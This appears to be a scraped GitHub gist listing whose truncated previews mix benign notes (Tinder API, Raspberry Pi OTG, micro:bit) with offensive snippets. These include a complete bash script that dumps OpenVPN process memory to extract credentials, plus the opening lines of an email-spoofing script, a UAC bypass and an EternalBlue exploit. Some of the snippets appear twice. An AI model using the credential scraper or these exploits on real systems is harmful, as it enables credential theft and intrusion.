Random1984

## email-spoofing.php
<?
/*
Email Spoofing script (PHP). For Educational Purposes only.
To note that capabilities of the script have been intentionally limited.

This work is licensed under a MIT License. Copyright 2012 Florian Bersier
*/

// Get posted data into local variables
$EmailFrom = Trim(stripslashes($_POST['EmailFrom']));    // Your email, e.g. me@example.com

## tinder-api-documentation.md

      
              1 file
            
          
              153 forks
            
          
              353 comments
            
          
              840 stars
            
          
                rtt
                / tinder-api-documentation.md
            
            
              Last active
              June 21, 2024 04:19
            
              
                Tinder API Documentation
              
          
    Tinder API documentation

Note: this was written in April/May 2014 and the API may has definitely changed since. I have nothing to do with Tinder, nor its API, and I do not offer any support for anything you may build on top of this. Proceed with caution

http://rsty.org/
I've sniffed most of the Tinder API to see how it works. You can use this to create bots (etc) very trivially. Some example python bot code is here -> https://gist.github.com/rtt/5a2e0cfa638c938cca59 (horribly quick and dirty, you've been warned!)

  
## README.md

      
              2 files
            
          
              80 forks
            
          
              102 comments
            
          
              202 stars
            
          
                Lazza
                / README.md
            
            
              Last active
              June 19, 2024 05:52
            
              
                VPNGate Python script
              
          
    This script is NOT MAINTAINED

This snippet of code was posted in 2014 and slightly revised in 2016 and 2017. It was more of a quick'n'dirty script than a polished tool. It is made only for Linux and in Python 2, which has since become outdated.
I currently do not use it, and I suggest you avoid it as well. Please do not expect support for using this script.
🔥 If you need an alternative, @glaucocustodio has kindly suggested EasyVPN in this comment.
The rest of the README is left for historical purposed.

  
## gist:8f092af4ca252e252eab

      
              1 file
            
          
              10 forks
            
          
              33 comments
            
          
              62 stars
            
          
                jesusprubio
                / gist:8f092af4ca252e252eab
            
            
              Last active
              April 12, 2023 15:02
            
              
                Proposal: A Node.js penetration test framework
              
          
    Proposal: Node.js penetration test framework

Hi guys! Since I started to write Bluebox-ng I've been tracking the different security projects I found written in Node.js. Now we've published the first stable version we think it's the right moment to speak among us (and, of course, everyone interested in it :).
Why?


I think we're rewriting the same stuff in our respective projects again and again. For example, almost any tool supports IPv6 because the functions we need are still not present in the Node core and the libraries I found (IMHO) were not enough.
There're different projects implementing exactly the same thing, ie: port scanners.
We're working in a too new environment, so we need to make it together.


## openvpnScraper.sh
#!/bin/bash
# This little hack-job will grab credentials from a running openvpn process in Linux
# Keep in mind this won't work if the user used the --auth-nocache flag
pid=$(ps -efww | grep -v grep | grep openvpn | awk '{print $2}')
echo $pid | grep rw-p /proc/$pid/maps | sed -n 's/^\([0-9a-f]*\)-\([0-9a-f]*\) .*$/\1 \2/p' | while read start stop; do gdb --batch-silent --silent --pid $pid -ex "dump memory $pid-$start-$stop.dump 0x$start 0x$stop"; done
echo "Your credentials should be listed below as username/password"

strings *.dump | awk 'NR>=3 && NR<=4 { print }'
rm *.dump --force

## HowToOTG.md

      
              1 file
            
          
              86 forks
            
          
              103 comments
            
          
              665 stars
            
          
                gbaman
                / HowToOTG.md
            
            
              Last active
              July 19, 2024 11:47
            
              
                Simple guide for setting up OTG modes on the Raspberry Pi Zero
              
          
    Raspberry Pi Zero OTG Mode

Simple guide for setting up OTG modes on the Raspberry Pi Zero - By Andrew Mulholland (gbaman).
The Raspberry Pi Zero (and model A and A+) support USB On The Go, given the processor is connected directly to the USB port, unlike on the B, B+ or Pi 2 B, which goes via a USB hub.

Because of this, if setup to, the Pi can act as a USB slave instead, providing virtual serial (a terminal), virtual ethernet, virtual mass storage device (pendrive) or even other virtual devices like HID, MIDI, or act as a virtual webcam!

It is important to note that, although the model A and A+ can support being a USB slave, they are missing the ID pin (is tied to ground internally) so are unable to dynamically switch between USB master/slave mode. As such, they default to USB master mode. There is no easy way to change this right now.

It is also important to note, that a USB to UART serial adapter is not needed for any of these guides, as may be documented elsewhere across the int

  
## HowToOTGFast.md

      
              1 file
            
          
              87 forks
            
          
              169 comments
            
          
              630 stars
            
          
                gbaman
                / HowToOTGFast.md
            
            
              Last active
              July 19, 2024 23:49
            
              
                Simple guide for setting up OTG modes on the Raspberry Pi Zero, the fast way!
              
          
    Setting up Pi Zero OTG - The quick way (No USB keyboard, mouse, HDMI monitor needed)

More details - http://blog.gbaman.info/?p=791
For this method, alongside your Pi Zero, MicroUSB cable and MicroSD card, only an additional computer is required, which can be running Windows (with Bonjour, iTunes or Quicktime installed), Mac OS or Linux (with Avahi Daemon installed, for example Ubuntu has it built in).

1. Flash Raspbian Jessie full or Raspbian Jessie Lite onto the SD card.

2. Once Raspbian is flashed, open up the boot partition (in Windows Explorer, Finder etc) and add to the bottom of the config.txt file dtoverlay=dwc2 on a new line, then save the file.

3. If using a recent release of Jessie (Dec 2016 onwards), then create a new file simply called ssh in the SD card as well. By default SSH i

  
## UACBypass.ps1
function Invoke-UACBypass {
<#
.SYNOPSIS

Bypasses UAC on Windows 10 by abusing the SilentCleanup task to win a race condition, allowing for a DLL hijack without a privileged file copy.

Author: Matthew Graeber (@mattifestation), Matt Nelson (@enigma0x3)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None

## pov.py
from microbit import *

time_   = 1
time_1  = 1
axis_x  = 0

#Line 8,9,10,11,12 are not needed. It is only functionality check of my LEDs.
pin16.write_digital(1)
pin15.write_digital(1)
pin14.write_digital(1)

## eternalblue8_exploit.py
#!/usr/bin/python
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
from impacket import smb, ntlm
from struct import pack
import sys
import socket

'''
EternalBlue exploit for Windows 8 and 2012 by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)
	<?
	/*
	Email Spoofing script (PHP). For Educational Purposes only.
	To note that capabilities of the script have been intentionally limited.

	This work is licensed under a MIT License. Copyright 2012 Florian Bersier
	*/

	// Get posted data into local variables
	$EmailFrom = Trim(stripslashes($_POST['EmailFrom'])); // Your email, e.g. me@example.com
	#!/bin/bash
	# This little hack-job will grab credentials from a running openvpn process in Linux
	# Keep in mind this won't work if the user used the --auth-nocache flag
	pid=$(ps -efww \| grep -v grep \| grep openvpn \| awk '{print $2}')
	echo $pid \| grep rw-p /proc/$pid/maps \| sed -n 's/^\([0-9a-f]\)-\([0-9a-f]\) .*$/\1 \2/p' \| while read start stop; do gdb --batch-silent --silent --pid $pid -ex "dump memory $pid-$start-$stop.dump 0x$start 0x$stop"; done
	echo "Your credentials should be listed below as username/password"

	strings *.dump \| awk 'NR>=3 && NR<=4 { print }'
	rm *.dump --force
	function Invoke-UACBypass {
	<#
	.SYNOPSIS

	Bypasses UAC on Windows 10 by abusing the SilentCleanup task to win a race condition, allowing for a DLL hijack without a privileged file copy.

	Author: Matthew Graeber (@mattifestation), Matt Nelson (@enigma0x3)
	License: BSD 3-Clause
	Required Dependencies: None
	Optional Dependencies: None
	from microbit import *

	time_ = 1
	time_1 = 1
	axis_x = 0

	#Line 8,9,10,11,12 are not needed. It is only functionality check of my LEDs.
	pin16.write_digital(1)
	pin15.write_digital(1)
	pin14.write_digital(1)
	#!/usr/bin/python
	# This file has no update anymore. Please see https://github.com/worawit/MS17-010
	from impacket import smb, ntlm
	from struct import pack
	import sys
	import socket

	'''
	EternalBlue exploit for Windows 8 and 2012 by sleepya
	The exploit might FAIL and CRASH a target system (depended on what is overwritten)